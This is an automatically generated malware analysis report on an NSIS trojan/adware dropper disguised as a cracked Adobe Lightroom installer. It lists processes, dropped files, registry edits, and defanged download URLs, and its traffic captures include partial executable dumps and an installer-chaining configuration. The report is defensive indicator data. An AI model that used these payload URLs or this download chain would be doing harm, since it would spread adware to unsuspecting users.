Trojan.NSIS.StartPage_94170c1d7c

by malwarelabrobot on July 25th, 2015 in Malware Descriptions.

not-a-virus:HEUR:AdWare.Win32.Generic (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 94170c1d7cc97eeb4a260214cc4d7c84
SHA1: 8ce24eef2d4d0deb513ae693e8cf29c94d27924f
SHA256: cfbb1b60f47ee16a671cf8be6b8f6a7c9e59f2c824aadc3d17df89675ec8abd1
SSDeep: 98304:mRWKtOl5CCGomEBkHUBmExJrIUg32t9RRyvo7VnOcyP24Vc35re94tb0eYbY1poE:m3tO3CCT/hBxtVtyUVnmSprzVIY7QKAY
Size: 7262915 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

wmic.exe:828
dwwin.exe:1200
setup-1228.exe:1136
bedhgjgbdh.exe:1980

The Trojan injects its code into the following process(es):

%original file name%.exe:1752
z1CUzZZucM.exe:1376

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process wmic.exe:828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\81437704772.txt (238 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\81437704772.txt (0 bytes)

The process dwwin.exe:1200 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\12E5B5.dmp (80387 bytes)

The process %original file name%.exe:1752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\S (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\z1CUzZZucM.exe (8156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NSISdl.dll (14 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)

The process setup-1228.exe:1136 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\bedhgjgbdh.hdbgjgh (10448 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh7.tmp\ZipDLL.dll (5500 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bedhgjgbdh.exe (9483 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\hdbgjgh.zip (67124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh7.tmp\jqhaleu.dll (4070 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsh7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp (0 bytes)

The process bedhgjgbdh.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\e4a9_appcompat.txt (9440 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\81437704772.txt (0 bytes)

The process z1CUzZZucM.exe:1376 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\751377546 (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm4.tmp (1826 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\BgWorker.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\setup-1228.exe (66159 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp (0 bytes)

Registry activity

The process wmic.exe:828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 17 A0 3D 80 74 53 F2 55 B7 E1 4E F9 AC 24 36"

The process dwwin.exe:1200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 69 42 22 59 07 E3 3E DB C8 AF 35 B2 F9 EA F7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 F4 D9 F7 4E 34 30 08 5D A8 D3 42 41 6C 65 B5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process setup-1228.exe:1136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 6B 63 AC 2F 6D 22 AB 9A B7 EA 5E BD D9 B9 89"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process bedhgjgbdh.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 2B 6C F8 B0 EA D5 0A C5 D6 66 20 0B 75 BD 17"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"

The process z1CUzZZucM.exe:1376 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 74 B4 F0 C4 25 F1 4A 84 5A 4E 70 F8 AB 58 AF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
be5ef235bb7939f116fb65d0c2a3f5f3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\bedhgjgbdh.exe
a5f8399a743ab7f9c88c645c35b1ebb5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\NSISdl.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\System.dll
727940e61ada0e4c8a40e747a95d1bf8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\z1CUzZZucM.exe
2dc35ddcabcb2b24919b9afae4ec3091 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh7.tmp\ZipDLL.dll
105593c85784013c15e983a018119cb1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh7.tmp\jqhaleu.dll
33ec04738007e665059cf40bc0f0c22b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\BgWorker.dll
a5f8399a743ab7f9c88c645c35b1ebb5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\NSISdl.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\System.dll
6206b94f91e92b7f7f72214c438dd414 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\nsArray.dll
c10e04dd4ad4277d5adc951bb331c777 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\nsDialogs.dll
4e301fdf449d26283d8edbe72468af33 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\setup-1228.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 40960 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 233472 6056 6144 2.84577 6c704af1c22a524871a02718160b7b5b

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=4276445&pid=449&b_typ=pe&reb=1&name=Adobe Photoshop Lightroom CC 2015 6.1 + Crack by [DTH]
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=449&tid=4276445&b_typ=pe&n=QWRvYmUgUGhvdG9zaG9wIExpZ2h0cm9vbSBDQyAy&reb=1
hxxp://redirectofthescript.elasticbeanstalk.com/DownloadManager/Get?p=638&d=544&l=461&n=1&productname=sevenzip&d1=4276445&d2=449&dynamicname=Adobe%20Photoshop%20Lightroom%20CC%202
hxxp://runtimeall1109-11.elasticbeanstalk.com/1437704750/downloadmanager/1437704750?78018984670YF10NTE2aDkwLDgfXD00LCseaDctNioebjwpHWhuaV11XGxuYGVcNW9fb2VncmlvHlspOS4rNy8sNDQeWyo5Li05H1x5bVlkYV9oWm1eNUFjZ1ldISwuMilIaG5sZmtkaWklKy0yL0RgX2Rua29oZSUxLSkoPz0eMi4qMDEeYFtraDY5LB5wcWQ0KQ
hxxp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4276445&pid=449&b_typ=pe&reb=1&name=Adobe Photoshop Lightroom CC 2015 6.1 + Crack by [DTH] 216.137.61.254
hxxp://get.file136desktop.info/DownloadManager/Get?p=638&d=544&l=461&n=1&productname=sevenzip&d1=4276445&d2=449&dynamicname=Adobe%20Photoshop%20Lightroom%20CC%202 54.225.247.99
hxxp://tap.winre.xyz/launch_v5.php?p=sevenzip&pid=449&tid=4276445&b_typ=pe&n=QWRvYmUgUGhvdG9zaG9wIExpZ2h0cm9vbSBDQyAy&reb=1 216.137.61.153
hxxp://get1.0111design.info/1437704750/downloadmanager/1437704750?78018984670YF10NTE2aDkwLDgfXD00LCseaDctNioebjwpHWhuaV11XGxuYGVcNW9fb2VncmlvHlspOS4rNy8sNDQeWyo5Li05H1x5bVlkYV9oWm1eNUFjZ1ldISwuMilIaG5sZmtkaWklKy0yL0RgX2Rua29oZSUxLSkoPz0eMi4qMDEeYFtraDY5LB5wcWQ0KQ 23.23.115.199


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /stub_maker.php?program=sevenzip&tid=4276445&pid=449&b_typ=pe&reb=1&name=Adobe Photoshop Lightroom CC 2015 6.1 + Crack by [DTH] HTTP/1.0
Host: dl.fripp54.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 76836
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="55b1a22319f9d.exe"
X-Powered-By: ASP.NET
Date: Fri, 24 Jul 2015 02:25:39 GMT
X-Cache: Miss from cloudfront
Via: 1.1 c82e56cf4be5d677c0658d92d66ce5b4.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 7oVteUfjn5Fe8zpxpvvw3I_UOPoVZ3chj-kxPuV6m8Rt5UmDxbDBFw==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
..........@...........................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected]...@[email protected]
[email protected]..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

<<< skipped >>>

GET /1437704750/downloadmanager/1437704750?78018984670YF10NTE2aDkwLDgfXD00LCseaDctNioebjwpHWhuaV11XGxuYGVcNW9fb2VncmlvHlspOS4rNy8sNDQeWyo5Li05H1x5bVlkYV9oWm1eNUFjZ1ldISwuMilIaG5sZmtkaWklKy0yL0RgX2Rua29oZSUxLSkoPz0eMi4qMDEeYFtraDY5LB5wcWQ0KQ HTTP/1.0
Host: get1.0111design.info
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Cache-Control: private
content-disposition: attachment;filename="setup.exe"
Content-Type: application/octet-stream
Date: Fri, 24 Jul 2015 02:26:04 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 715208
Connection: Close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^....... ...0.......p....@.........
.........................1.......................................t....
...`..P"..............................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected].......
[email protected]...@... ...........................rsrc.
..P"...`...$...z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....E...Si.. ..VW.T.....tO.q.3.;5..E.sB..i.. ...D.......t.G...
..t...O..t .....u...3....3...F.. ..;5..E.r._^[...U..QQ.U.SV..i.. .

<<< skipped >>>

GET /launch_v5.php?p=sevenzip&pid=449&tid=4276445&b_typ=pe&n=QWRvYmUgUGhvdG9zaG9wIExpZ2h0cm9vbSBDQyAy&reb=1 HTTP/1.0
Host: tap.winre.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 2422
Connection: close
Date: Fri, 24 Jul 2015 02:25:57 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 ae96545e0552212804f85fcc54706cdb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: hQgPJoxgEzpp0LZ44SqwJa9mdlMH8tUCNExcNuCB6daCjFLIvzxljw==
files=3.t1=dl.u1=hXXp://get.file136desktop.info/DownloadManager/Get?p=
638&d=544&l=461&n=1&productname=sevenzip&d1=4276445&d2=449&dynamicname
=Adobe%20Photoshop%20Lightroom%20CC%202.n1=setup-1228.exe.b1=r
u.c1=sevenzip-2.s1=0.m1=1.d1=1500.t2=dl.u2=hXXp://VVV.downloadspot1.bi
z/download.php?version=1.1.5.26&campid=2140&instid[appname]=&instid[ap
psetupurl]=http://pe-sixi.com/downloadS.php?bu=am&instid[c
mdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon
_installer.png&prefix=Setup&instid[thankyoupage]=.n2=Setup__2140_il245
.exe.b2=am.c2=2140-sevenzip.s2=0.m2=0.d2=0.t3=dl.u3=hXXp://sub.spirlym
o.com/installers/cli/1437703276915/SevenZip_downloader-QepdDtLTW.exe.n
3=SevenZip_downloader-QepdDtLTW.exe.b3=bi.c3=sevenzip-3.s3=0.m3=1.d3=1
500.t4=dl.u4=hXXp://api.kbm2.com/downloadLauncher.ashx?cid=1041.n4=7zi
pSetup.exe.b4=st.c4=sevenzip-1.s4=0.m4=0.d4=0.t5=dl.u5=hXXp://download
.oneinstaller.com/installer/?iid=324&nsoft=9.n5=SevenZip_9.20.x.exe.b5
=on.c5=sevenzip-2.s5=0.m5=1.d5=1500.t6=dl.u6=hXXp://get.cp-start.biz/?
affId=1006&appTitle=Adobe%20Photoshop%20Lightroom%20CC%202&s1=
449&s2=4276445&setupName=cpSetup&appVersion=2.92&instId=11.n6=cpSetup.
exe.b6=cp.c6=sevenzip-1.s6=0.m6=0.d6=0.t7=dl.u7=hXXp://stapi.sweetcome
t.com/api/stamp/setup.exe?&affiliateid=1780&productname=Adobe%20Phot
oshop%20Lightroom%20CC%202&producturl=http://d3pccup19xda2
t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3p
ccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20

<<< skipped >>>

GET /DownloadManager/Get?p=638&d=544&l=461&n=1&productname=sevenzip&d1=4276445&d2=449&dynamicname=Adobe%20Photoshop%20Lightroom%20CC%202 HTTP/1.0
Host: get.file136desktop.info
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 24 Jul 2015 02:25:50 GMT
Location: hXXp://get1.0111design.info/1437704750/downloadmanager/1437704750?78018984670YF10NTE2aDkwLDgfXD00LCseaDctNioebjwpHWhuaV11XGxuYGVcNW9fb2VncmlvHlspOS4rNy8sNDQeWyo5Li05H1x5bVlkYV9oWm1eNUFjZ1ldISwuMilIaG5sZmtkaWklKy0yL0RgX2Rua29oZSUxLSkoPz0eMi4qMDEeYFtraDY5LB5wcWQ0KQ
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 380
Connection: Close
<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXp://get1.
0111design.info/1437704750/downloadmanager/1437704750?78018984670YF10N
TE2aDkwLDgfXD00LCseaDctNioebjwpHWhuaV11XGxuYGVcNW9fb2VncmlvHlspOS4rNy8
sNDQeWyo5Li05H1x5bVlkYV9oWm1eNUFjZ1ldISwuMilIaG5sZmtkaWklKy0yL0RgX2Rua
29oZSUxLSkoPz0eMi4qMDEeYFtraDY5LB5wcWQ0KQ">here</a>.</h2&g
t;..</body></html>....


The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1752:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\z1CUzZZucM.exe
tid=4276445&pid=449&b_typ=pe&reb=1&name=Adobe Photoshop Lightroom CC 2015 6.1 + Crack by [DTH]
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp
ogram=sevenzip&tid=4276445&pid=449&b_typ=pe&reb=1&name=Adobe Photoshop Lightroom CC 2015 6.1 + Crack by [DTH]
.reloc
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
System.dll
callback%d
IhXXp://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl0^
BhXXp://VVV.microsoft.com/pki/certs/MicRooCerAut2011_2011_03_22.crt0
3hXXp://VVV.microsoft.com/pkiops/docs/primarycps.htm0@
hXXp://microsoft.com0
)Microsoft Root Certificate Authority 20100
EhXXp://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z
>hXXp://VVV.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt0
1hXXp://VVV.microsoft.com/PKI/docs/CPS/default.htm0@
EhXXp://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl0Z
>hXXp://VVV.microsoft.com/pki/certs/MicTimStaPCA_2010-07-01.crt0
nsd2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\S
ram=sevenzip&tid=4276445&pid=449&b_typ=pe&reb=1&name=Adobe Photoshop Lightroom CC 2015 6.1 + Crack by [DTH]
l.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4276445&pid=449&b_typ=pe&reb=1&name=Adobe Photoshop Lightroom CC 2015 6.1 + Crack by [DTH]
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
201507240225
hXXp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4276445&pid=449&b_typ=pe&reb=1&name=Adobe Photoshop Lightroom CC 2015 6.1 + Crack by [DTH]
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
vcredist_x64.ex

%original file name%.exe_1752_rwx_10004000_00001000:

callback%d

z1CUzZZucM.exe_1376:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr5.tmp\setup-1228.exe
,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=449&subid2=4276445
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr5.tmp\BgWorker.dll
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr5.tmp
%d/at
key=end
} .rdata
KERNEL32.DLL
nsArray.dll
Join
.reloc
System.dll
callback%d
@.reloc
ButtonEvent.dll
`.reloc
MsgWaitForMultipleObjects
BgWorker.dll
LangDLL.dll
Y.rEO2
.bb~WD
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr5.tmp
setup-1228.exe
SETUP-~1.EXE
uctname=sevenzip&d1=4276445&d2=449&dynamicname=Adobe%20Photoshop%20Lightroom%20CC%202
1377546
